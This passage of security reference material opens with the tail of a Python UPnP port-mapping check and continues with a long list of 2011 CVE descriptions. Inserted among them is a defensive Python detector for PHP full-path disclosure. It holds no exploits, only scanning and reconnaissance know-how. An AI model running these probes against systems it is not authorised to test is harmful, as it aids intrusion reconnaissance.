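    f'<s:Envelope xmlns:s="{SOAP_ENV}" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    f'<s:Body><u:AddPortMappingResponse xmlns:u="{SERVICE}"/></s:Body>'
    '</s:Envelope>'
)
SAMPLE_FAULT = (
    '<?xml version="1.0"?>'
    f'<s:Envelope xmlns:s="{SOAP_ENV}" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<s:Body><s:Fault><faultcode>s:Client</faultcode>'
    '<faultstring>UPnPError</faultstring><detail>'
    f'<UPnPError xmlns="{UPNP_CTRL}"><errorCode>718</errorCode>'
    '<errorDescription>ConflictInMappingEntry</errorDescription>'
    '</UPnPError></detail></s:Fault></s:Body></s:Envelope>'
)

if __name__ == "__main__":
    print(check_external_forwarding(lambda h, b: (200, SAMPLE_OK)))
    print(check_external_forwarding(lambda h, b: (500, SAMPLE_FAULT)))
```

A 718 fault only says the slot is taken; retry with another external port before concluding the device rejects WAN-side mappings. A mapping that is accepted should be deleted again with DeletePortMapping once the check is recorded.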
[CVE-2011-4498] Cross-site request forgery (CSRF) vulnerability in the web console in Zenprise Device Manager 6.x through 6.1.8 allows remote attackers to hijack the authentication of administrators for requests that wipe mobile devices.
[CVE-2011-4465] Cross-site scripting (XSS) vulnerability in IBM Lotus Mobile Connect (LMC) 6.1.4 allows remote attackers to inject arbitrary web script or HTML via vectors related to a hidden redirect URL.
[CVE-2011-4447] The "encrypt wallet" feature in wxBitcoin and bitcoind 0.4.x before 0.4.1, and 0.5.0rc, does not properly interact with the deletion functionality of BSDDB, which allows context-dependent attackers to obtain unencrypted private keys from Bitcoin wallet files by bypassing the BSDDB interface and reading entries that are marked for deletion.
[CVE-2011-4435] The web-server component in the Consolidation and Analysis Engine (CAE) Server in DB2 Query Monitor in IBM DB2 Tools 2.3.0 for z/OS does not prevent directory browsing, which allows remote attackers to obtain sensitive information via HTTP requests.
[CVE-2011-4368] Cross-site scripting (XSS) vulnerability in Remote Development Services (RDS) in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4345] Cross-site scripting (XSS) vulnerability in Namazu before 2.0.21, when Internet Explorer 6 or 7 is used, allows remote attackers to inject arbitrary web script or HTML via a cookie.
[CVE-2011-4344] Cross-site scripting (XSS) vulnerability in Jenkins Core in CloudBees Jenkins before 1.438, and 1.409 LTS before 1.409.3 LTS, when a stand-alone container is used, allows remote attackers to inject arbitrary web script or HTML via vectors related to error messages.
[CVE-2011-4340] Multiple cross-site scripting (XSS) vulnerabilities in Symphony CMS 2.2.3 and possibly other versions before 2.2.4 allow remote authenticated users with Author privileges to inject arbitrary web script or HTML via (1) the profile parameter to extensions/profiledevkit/content/content.profile.php, as demonstrated via requests to (a) the default URI, (b) about/, or (c) drafts/
[CVE-2011-4335] Multiple cross-site scripting (XSS) vulnerabilities in Contao before 2.10.2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php in a (1) teachers.html or (2) teachers/ action.
[CVE-2011-4332] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! 1.6.3 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4329] Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 3.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter in a setup action to admin/company.php, or the PATH_INFO to (2) admin/security_other.php, (3) admin/events.php, or (4) admin/user.php.
[CVE-2011-4319] Cross-site scripting (XSS) vulnerability in the i18n translations helper method in Ruby on Rails 3.0.x before 3.0.11 and 3.1.x before 3.1.2, and the rails_xss plugin in Ruby on Rails 2.3.x, allows remote attackers to inject arbitrary web script or HTML via vectors related to a translations string whose name ends with an "html" substring.
[CVE-2011-4312] Multiple cross-site scripting (XSS) vulnerabilities in the commenting system in Review Board before 1.5.7 and 1.6.x before 1.6.3 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) diff viewer or (2) screenshot component.
[CVE-2011-4307] Cross-site scripting (XSS) vulnerability in mod/wiki/lang/en/wiki.php in Moodle 2.0.x before 2.0.5 and 2.1.x before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the section parameter.
[CVE-2011-4306] Cross-site scripting (XSS) vulnerability in course/editsection.html in Moodle 1.9.x before 1.9.14 allows remote authenticated users to inject arbitrary web script or HTML via crafted data.
[CVE-2011-4299] Cross-site scripting (XSS) vulnerability in mod/wiki/pagelib.php in Moodle 2.0.x before 2.0.5 and 2.1.x before 2.1.2 allows remote authenticated users to inject arbitrary web script or HTML via a wiki comment.
[CVE-2011-4294] The error-message functionality in Moodle 1.9.x before 1.9.13, 2.0.x before 2.0.4, and 2.1.x before 2.1.1 does not ensure that a continuation link refers to an http or https URL for the local Moodle instance, which might allow attackers to trick users into visiting arbitrary web sites via unspecified vectors.
[CVE-2011-4290] Multiple cross-site scripting (XSS) vulnerabilities in lib/weblib.php in Moodle 1.9.x before 1.9.12 allow remote attackers to inject arbitrary web script or HTML via vectors related to URL encoding.
[CVE-2011-4286] Multiple cross-site scripting (XSS) vulnerabilities in the media-filter implementation in filter/mediaplugin/filter.php in Moodle 1.9.x before 1.9.11 and 2.0.x before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) Flash Video (aka FLV) files and (2) YouTube videos.
[CVE-2011-4282] Multiple cross-site scripting (XSS) vulnerabilities in the course-tags functionality in tag/coursetags_more.php in Moodle 2.0.x before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) sort or (2) show parameter.
[CVE-2011-4280] Cross-site scripting (XSS) vulnerability in the Spike PHPCoverage (aka spikephpcoverage) library, as used in Moodle 2.0.x before 2.0.2 and other products, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4278] Cross-site scripting (XSS) vulnerability in the tag autocomplete functionality in Moodle 1.9.x before 1.9.11 and 2.0.x before 2.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4277] Cross-site scripting (XSS) vulnerability in CourseForum ProjectForum 7.0.1.3038 allows remote attackers to inject arbitrary web script or HTML via a crafted name of an object within a more object on a wiki page.
[CVE-2011-4275] Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.
[CVE-2011-4274] Cross-site scripting (XSS) vulnerability in the A-Form PC and PC/Mobile before 3.1 plug-ins for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-2676.
[CVE-2011-4273] Multiple cross-site scripting (XSS) vulnerabilities in GoAhead Webserver 2.18 allow remote attackers to inject arbitrary web script or HTML via (1) the group parameter to goform/AddGroup, related to addgroup.asp
[CVE-2011-4265] Cross-site scripting (XSS) vulnerability in phpWebSite before 1.0.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4264] Cross-site scripting (XSS) vulnerability in Etomite before 1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4263] Cross-site scripting (XSS) vulnerability in Schneider Electric PowerChute Business Edition before 8.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4232] The web server in Cisco Unified MeetingPlace 6.1 and 8.5 produces different responses for directory queries depending on whether the directory exists, which allows remote attackers to enumerate directory names via a series of queries, aka Bug ID CSCtt94070.
[CVE-2011-4172] Multiple cross-site scripting (XSS) vulnerabilities in KENT-WEB WEB FORUM before 5.1 allow remote attackers to inject arbitrary web script or HTML via (1) an e-mail address field or (2) a cookie, a related issue to CVE-2011-3383, CVE-2011-3983, and CVE-2011-3984.
[CVE-2011-4171] Cross-site scripting (XSS) vulnerability in content/error.jsp in IBM WebSphere ILOG Rule Team Server 7.1.1 allows remote attackers to inject arbitrary web script or HTML via the project parameter to teamserver/faces/home.jsp.
[CVE-2011-4170] Cross-site scripting (XSS) vulnerability in the theme_adium_append_message function in empathy-theme-adium.c in the Adium theme in libempathy-gtk in Empathy 3.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted alias (aka nickname) in a /me event, a different vulnerability than CVE-2011-3635.
[CVE-2011-4156] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 9.0x and 9.1x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-4155.
[CVE-2011-4155] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 9.0x and 9.1x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-4156.
[CVE-2011-4143] EMC RSA enVision 4.0 before SP4 P5 and 4.1 before P3 allows remote attackers to obtain sensitive information about environment variables in the web system via unspecified vectors.
[CVE-2011-4142] The Web Search feature in EMC SourceOne Email Management 6.5 before 6.5.2.4033, 6.6 before 6.6.1.2194, and 6.7 before 6.7.2.2033 places cleartext credentials in log files, which allows local users to obtain sensitive information by reading these files.
[CVE-2011-4140] The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.
[CVE-2011-4129] (1) services/twitter/twitter-contact-view.c and (2) services/twitter/twitter-item-view.c in libsocialweb before 0.25.20 automatically connect to Twitter when no Twitter account is set, which might allow remote attackers to obtain sensitive information via a man-in-the-middle (MITM) attack.
[CVE-2011-4112] The net subsystem in the Linux kernel before 3.1 does not properly restrict use of the IFF_TX_SKB_SHARING flag, which allows local users to cause a denial of service (panic) by leveraging the CAP_NET_ADMIN capability to access /proc/net/pktgen/pgctrl, and then using the pktgen package in conjunction with a bridge device for a VLAN interface.
[CVE-2011-4087] The br_parse_ip_options function in net/bridge/br_netfilter.c in the Linux kernel before 2.6.39 does not properly initialize a certain data structure, which allows remote attackers to cause a denial of service by leveraging connectivity to a network interface that uses an Ethernet bridge device.
[CVE-2011-4078] include/iniset.php in Roundcube Webmail 0.5.4 and earlier, when PHP 5.3.7 or 5.3.8 is used, allows remote attackers to trigger a GET request for an arbitrary URL, and cause a denial of service (resource consumption and inbox outage), via a Subject header containing only a URL, a related issue to CVE-2011-3379.
[CVE-2011-4074] Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command.
[CVE-2011-4055] Buffer overflow in the WebClient ActiveX control in Siemens Tecnomatix FactoryLink 6.6.1 (aka 6.6 SP1), 7.5.217 (aka 7.5 SP2), and 8.0.2.54 allows remote attackers to execute arbitrary code via a long string in a parameter associated with the location URL.
[CVE-2011-4054] Cross-site scripting (XSS) vulnerability in login.fcc in CA SiteMinder R6 SP6 before CR7 and R12 SP3 before CR8 allows remote attackers to inject arbitrary web script or HTML via the postpreservationdata parameter.
[CVE-2011-4052] Stack-based buffer overflow in CEServer.exe in the CEServer component in the Remote Agent module in InduSoft Web Studio 6.1 and 7.0 allows remote attackers to execute arbitrary code via a crafted 0x15 (aka Remove File) operation for a file with a long name.
[CVE-2011-4051] CEServer.exe in the CEServer component in the Remote Agent module in InduSoft Web Studio 6.1 and 7.0 does not require authentication, which allows remote attackers to execute arbitrary code via vectors related to creation of a file, loading a DLL, and process control.
[CVE-2011-4041] webvrpcs.exe in Advantech/BroadWin WebAccess allows remote attackers to execute arbitrary code or obtain a security-code value via a long string in an RPC request to TCP port 4592.
[CVE-2011-4038] Cross-site scripting (XSS) vulnerability in Invensys Wonderware HMI Reports 3.42.835.0304 and earlier, as used in Ocean Data Systems Dream Report before 4.0 and other products, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2011-4035] Cross-site scripting (XSS) vulnerability in Schneider Electric Vijeo Historian 4.30 and earlier, CitectHistorian 4.30 and earlier, and CitectSCADAReports 4.10 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4024] Cross-site scripting (XSS) vulnerability in ocsinventory in OCS Inventory NG 2.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4015] Cisco IOS 15.2S allows remote attackers to cause a denial of service (interface queue wedge) via malformed UDP traffic on port 465, aka Bug ID CSCts48300.
[CVE-2011-4014] The TAC Case Attachment tool in Cisco Wireless Control System (WCS) 7.0 allows remote authenticated users to read arbitrary files under webnms/Temp/ via unspecified vectors, aka Bug ID CSCtq86807.
[CVE-2011-4004] Buffer overflow in the ATAS32 processing functionality in the Cisco WebEx Recording Format (WRF) player T26 before SP49 EP40 and T27 before SP28 allows remote attackers to execute arbitrary code via a crafted WRF file.
[CVE-2011-3999] Cross-site scripting (XSS) vulnerability in the RSS/Atom feed-reader implementation in Iwate Portal Bar allows remote attackers to inject arbitrary web script or HTML via a crafted feed.
[CVE-2011-3998] Cross-site scripting (XSS) vulnerability in Apple WebObjects 5.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3990] Cross-site scripting (XSS) vulnerability in plugin/comment.inc.php in PukiWiki Plus! 1.4.7plus-u2-i18n and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3986] Cross-site scripting (XSS) vulnerability in Pligg before 1.2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3985] Cross-site scripting (XSS) vulnerability in Plume before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3984] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB FORUM 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to "web form entries."
[CVE-2011-3983] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB FORUM 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to cookies.
[CVE-2011-3981] PHP remote file inclusion vulnerability in actions.php in the Allwebmenus plugin 1.1.3 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the abspath parameter.
[CVE-2011-3979] Cross-site scripting (XSS) vulnerability in ztemp/view_compiled/Theme/theme_admin_setasdefault.php in the theme module in Zikula Application Framework 1.3.0 build 3168, 1.2.7, and probably other versions allows remote attackers to inject arbitrary web script or HTML via the themename parameter in the setasdefault action to index.php.
[CVE-2011-3978] Multiple cross-site scripting (XSS) vulnerabilities in LightNEasy.php in LightNEasy 3.2.4 allow remote authenticated users to inject arbitrary web script or HTML via the (1) commentemail, (2) commentmessage, or (3) commentname parameter in a sendcomment action for the news page.
[CVE-2011-3975] A certain HTC update for Android 2.3.4 build GRJ22, when the Sense interface is used on the HTC EVO 3D, EVO 4G, ThunderBolt, and unspecified other devices, provides the HtcLoggers.apk application, which allows user-assisted remote attackers to obtain a list of telephone numbers from a log, and other sensitive information, by leveraging the android.permission.INTERNET application permission and establishing TCP sessions to 127.0.0.1 on port 65511 and a second port.
[CVE-2011-3889] Heap-based buffer overflow in the Web Audio implementation in Google Chrome before 15.0.874.102 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2011-3877] Cross-site scripting (XSS) vulnerability in the appcache internals page in Google Chrome before 15.0.874.102 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3865] Cross-site scripting (XSS) vulnerability in the Black-LetterHead theme before 1.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.
[CVE-2011-3864] Cross-site scripting (XSS) vulnerability in the The Erudite theme before 2.7.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter.
[CVE-2011-3863] Cross-site scripting (XSS) vulnerability in the RedLine theme before 1.66 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3862] Cross-site scripting (XSS) vulnerability in the Morning Coffee theme before 3.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.
[CVE-2011-3861] Cross-site scripting (XSS) vulnerability in the Web Minimalist 200901 theme before 1.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.
[CVE-2011-3860] Cross-site scripting (XSS) vulnerability in the Cover WP theme before 1.6.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3859] Cross-site scripting (XSS) vulnerability in the Trending theme before 0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter.
[CVE-2011-3858] Cross-site scripting (XSS) vulnerability in the Pixiv Custom theme before 2.1.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3857] Cross-site scripting (XSS) vulnerability in the Antisnews theme before 1.10 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3856] Cross-site scripting (XSS) vulnerability in the Elegant Grunge theme before 1.0.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3855] Cross-site scripting (XSS) vulnerability in the F8 Lite theme before 4.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3854] Cross-site scripting (XSS) vulnerability in the ZenLite theme before 4.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3853] Cross-site scripting (XSS) vulnerability in the Hybrid theme before 0.10 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter.
[CVE-2011-3852] Cross-site scripting (XSS) vulnerability in the EvoLve theme before 1.2.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3851] Cross-site scripting (XSS) vulnerability in the News theme before 0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter.
[CVE-2011-3850] Cross-site scripting (XSS) vulnerability in the Atahualpa theme before 3.6.8 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2011-3845] Use-after-free vulnerability in Apple Safari 5.1.2, when a plug-in with a blocking function is installed, allows user-assisted remote attackers to execute arbitrary code via a crafted web page that is accessed during user interaction with the plug-in, leading to improper coordination between an API call and the plug-in unloading functionality, as demonstrated by the Adobe Flash and RealPlayer plug-ins.
[CVE-2011-3844] Apple Safari 5.0.5 does not properly implement the setInterval function, which allows remote attackers to spoof the address bar via a crafted web page.
[CVE-2011-3841] Cross-site scripting (XSS) vulnerability in uploadify/get_profile_avatar.php in the WP Symposium plugin before 11.12.08 for WordPress allows remote attackers to inject arbitrary web script or HTML via the uid parameter.
[CVE-2011-3835] Multiple cross-site scripting (XSS) vulnerabilities in Wuzly 2.0 allow remote attackers to inject arbitrary web script or HTML via the Referer header to (1) admin/login.php and (2) admin/404.php
[CVE-2011-3830] Cross-site scripting (XSS) vulnerability in search.php in Support Incident Tracker (aka SiT!) 3.65 allows remote attackers to inject arbitrary web script or HTML via the search_string parameter.
[CVE-2011-3828] DVRemoteAx.ax 2.1.0.39 in the DVR Remote ActiveX control allows remote attackers to execute arbitrary code via a crafted DVRobot.dll file in a manifest directory on a web server.
[CVE-2011-3817] Website Baker 2.8.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by admin/media/parameters.php and certain other files. NOTE: this might overlap CVE-2005-2436.
[CVE-2011-3816] WEBinsta mailing list manager 1.3e allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by install/install3.php and certain other files.
[CVE-2011-3815] WeBid 1.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by js/calendar.php and certain other files.
[CVE-2011-3814] WebCalendar 1.2.3, and other versions before 1.2.5, allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by ws/user_mod.php and certain other files.
[CVE-2011-3810] TinyWebGallery (TWG) 1.8.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by i_frames/i_register.php.
[CVE-2011-3757] Moodle 2.0.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by webservice/xmlrpc/locallib.php and certain other files.
[CVE-2011-3737] eyeOS 2.2.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by apps/rmail/webmail/program/lib/Net/SMTP.php and certain other files.
[CVE-2011-3695] WebCalendar 1.2.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by footer.php and certain other files.
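The eight entries above (CVE-2011-3695 through CVE-2011-3817) are the same weakness in different PHP applications: requesting an include file directly, outside the application's front controller, makes PHP emit an error whose text carries the absolute filesystem path. The Python below is an added example, not part of vulscan or any of the listed projects; it applies a detector for PHP's default error rendering (plain and html_errors form) to response bodies and recovers the install root by stripping the requested URI from the leaked path. The response bodies and the paths in them are constructed for the example.

```python
"""Detect PHP full-path disclosure in HTTP response bodies (added example).

Assumed: PHP's default error format "Warning: ... in /path/file.php on line N",
with or without the <b> tags that html_errors adds. Sample responses are
constructed; the URIs echo the demonstration files named in the entries.
"""
import re

PHP_ERROR_RE = re.compile(
    r"(?:Fatal error|Warning|Notice|Parse error|Deprecated)(?:</b>)?\s*:\s*.*?"
    r"\s+in\s+(?:<b>)?"
    r"(?P<path>(?:[A-Za-z]:\\|/)[^\s<]+?\.php)(?:</b>)?"
    r"\s+on\s+line\s+(?:<b>)?(?P<line>\d+)",
    re.IGNORECASE | re.DOTALL,
)


def find_path_disclosure(body):
    """Return [(absolute_path, line_number), ...] leaked in a response body."""
    return [(m.group("path"), int(m.group("line")))
            for m in PHP_ERROR_RE.finditer(body)]


def install_root(leaked_path, requested_uri):
    """Recover the web root: the leaked path minus the URI that was requested.

    Returns None when the leaked path does not end with the requested script
    (e.g. the error came from an included file, not the one requested).
    """
    norm = leaked_path.replace("\\", "/")
    suffix = requested_uri.lstrip("/")
    if norm.endswith("/" + suffix):
        return norm[: -len(suffix) - 1] or "/"
    return None


def audit(responses):
    """responses: {uri: body}. Returns findings only for URIs that leak."""
    findings = {}
    for uri, body in responses.items():
        leaks = find_path_disclosure(body)
        if not leaks:
            continue
        roots = {install_root(p, uri) for p, _ in leaks} - {None}
        findings[uri] = {
            "paths": [p for p, _ in leaks],
            "root": next(iter(roots), None),
        }
    return findings


# Constructed responses: two leaking direct requests and one clean page.
SAMPLE_RESPONSES = {
    "/admin/media/parameters.php": (
        "<br />\n<b>Warning</b>:  include(../config.php): failed to open stream: "
        "No such file or directory in "
        "<b>/var/www/html/admin/media/parameters.php</b> on line <b>12</b><br />\n"
    ),
    "/ws/user_mod.php": (
        "Fatal error: Call to undefined function user_load() in "
        "/srv/webcalendar/ws/user_mod.php on line 3\n"
    ),
    "/index.php": "<html><body><h1>Login</h1></body></html>",
}

if __name__ == "__main__":
    for uri, finding in audit(SAMPLE_RESPONSES).items():
        print(uri, "->", finding)
```

Run this over every .php file a crawl or a package listing turns up, not only the front controller; the fix on the server side is display_errors=Off (log to file instead) and, in the application, a guard such as a defined() check at the top of every include.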
[CVE-2011-3689] Cross-site scripting (XSS) vulnerability in Licenses.html in Wibu-Systems CodeMeter WebAdmin 3.30 and 4.30 allows remote attackers to inject arbitrary web script or HTML via the BoxSerial parameter.
[CVE-2011-3687] Multiple cross-site scripting (XSS) vulnerabilities in Sonexis ConferenceManager 9.2.11.0 allow remote attackers to inject arbitrary web script or HTML via (1) the txtConferenceID parameter to HostLogin.asp, (2) the txtConferenceID parameter to ParticipantLogin.asp, (3) the acp parameter to ForgotPIN.asp, or the (4) Description, (5) title, or (6) Heading parameter to Error.asp.
[CVE-2011-3686] Multiple cross-site scripting (XSS) vulnerabilities in myAddressBook.asp in Sonexis ConferenceManager 9.2.11.0 and 9.3.14.0 allow remote attackers to inject arbitrary web script or HTML via the (1) fname, (2) lname, (3) email_edit, (4) email, (5) email2, (6) email3, (7) sms, (8) sms_id, or (9) work parameter.
[CVE-2011-3684] Multiple cross-site scripting (XSS) vulnerabilities in Tembria Server Monitor before 6.0.5 Build 2252 allow remote attackers to inject arbitrary web script or HTML via (1) the siteid parameter to logbook.asp, (2) the siteid parameter to monitor-events.asp, (3) the siteid parameter to reports-config-by-device.asp, (4) the siteid parameter to reports-config-by-monitor.asp, (5) the siteid parameter to reports-monitoring-queue.asp, (6) the action parameter to site-list.asp, the (7) siteid or (8) type parameter to event-history.asp, the (9) siteid or (10) type parameter to admin-history.asp, the (11) siteid or (12) id parameter to dashboard-view.asp, the (13) siteid or (14) dn parameter to device-events.asp, the (15) siteid or (16) submit parameter to device-finder.asp, the (17) siteid or (18) dn parameter to device-monitors.asp, the (19) siteid or (20) type parameter to device-views.asp, the (21) siteid or (22) type parameter to monitor-views.asp, the (23) siteid or (24) sel parameter to reports-list.asp, the (25) siteid, (26) action, or (27) sel parameter to monitor-list.asp, or the (28) siteid, (29) action, or (30) sel parameter to device-list.asp.
[CVE-2011-3667] The User.offer_account_by_email WebService method in Bugzilla 2.x and 3.x before 3.4.13, 3.5.x and 3.6.x before 3.6.7, 3.7.x and 4.0.x before 4.0.3, and 4.1.x through 4.1.3, when createemailregexp is not empty, does not properly handle user_can_create_account settings, which allows remote attackers to create user accounts by leveraging a token contained in an e-mail message.
[CVE-2011-3664] Mozilla Firefox before 9.0, Thunderbird before 9.0, and SeaMonkey before 2.6 on Mac OS X do not properly handle certain DOM frame deletions by plugins, which allows remote attackers to cause a denial of service (incorrect pointer dereference and application crash) or possibly have unspecified other impact via a crafted web site.
[CVE-2011-3663] Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6 allow remote attackers to capture keystrokes entered on a web page, even when JavaScript is disabled, by using SVG animation accessKey events within that web page.
[CVE-2011-3657] Multiple cross-site scripting (XSS) vulnerabilities in Bugzilla 2.x and 3.x before 3.4.13, 3.5.x and 3.6.x before 3.6.7, 3.7.x and 4.0.x before 4.0.3, and 4.1.x through 4.1.3, when debug mode is used, allow remote attackers to inject arbitrary web script or HTML via vectors involving a (1) tabular report, (2) graphical report, or (3) new chart.
[CVE-2011-3655] Mozilla Firefox 4.x through 7.0 and Thunderbird 5.0 through 7.0 perform access control without checking for use of the NoWaiverWrapper wrapper, which allows remote attackers to gain privileges via a crafted web site.
[CVE-2011-3653] Mozilla Firefox before 8.0 and Thunderbird before 8.0 on Mac OS X do not properly interact with the GPU memory behavior of a certain driver for Intel integrated GPUs, which allows remote attackers to bypass the Same Origin Policy and read image data via vectors related to WebGL textures.
[CVE-2011-3648] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.6.24 and 4.x through 7.0 and Thunderbird before 3.1.6 and 5.0 through 7.0 allows remote attackers to inject arbitrary web script or HTML via crafted text with Shift JIS encoding.
[CVE-2011-3647] The JSSubScriptLoader in Mozilla Firefox before 3.6.24 and Thunderbird before 3.1.6 does not properly handle XPCNativeWrappers during calls to the loadSubScript method in an add-on, which makes it easier for remote attackers to gain privileges via a crafted web site that leverages certain unwrapping behavior, a related issue to CVE-2011-3004.
[CVE-2011-3636] Cross-site request forgery (CSRF) vulnerability in the management interface in FreeIPA before 2.1.4 allows remote attackers to hijack the authentication of administrators for requests that make configuration changes.
[CVE-2011-3635] Cross-site scripting (XSS) vulnerability in the theme_adium_append_message function in empathy-theme-adium.c in the Adium theme in libempathy-gtk in Empathy 3.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted alias (aka nickname).
[CVE-2011-3598] Multiple cross-site scripting (XSS) vulnerabilities in phpPgAdmin before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) a web page title, related to classes/Misc.php
[CVE-2011-3580] IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.
[CVE-2011-3579] server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.
[CVE-2011-3578] Cross-site scripting (XSS) vulnerability in bug_actiongroup_ext_page.php in MantisBT before 1.2.8 allows remote attackers to inject arbitrary web script or HTML via the action parameter, related to bug_actiongroup_page.php, a different vulnerability than CVE-2011-3357.
[CVE-2011-3577] IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.3 does not properly implement Activity Token authentication for Web Services, which has unspecified impact and attack vectors.
[CVE-2011-3576] Cross-site scripting (XSS) vulnerability in IBM Lotus Domino 8.5.2 allows remote attackers to inject arbitrary web script or HTML via the PanelIcon parameter in an fmpgPanelHeader ReadForm action to WebAdmin.nsf.
[CVE-2011-3575] Stack-based buffer overflow in the NSFComputeEvaluateExt function in Nnotes.dll in IBM Lotus Domino 8.5.2 allows remote authenticated users to execute arbitrary code via a long tHPRAgentName parameter in an fmHttpPostRequest OpenForm action to WebAdmin.nsf.
[CVE-2011-3569] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect confidentiality via unknown vectors related to Web Services Security.
[CVE-2011-3568] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Services Security.
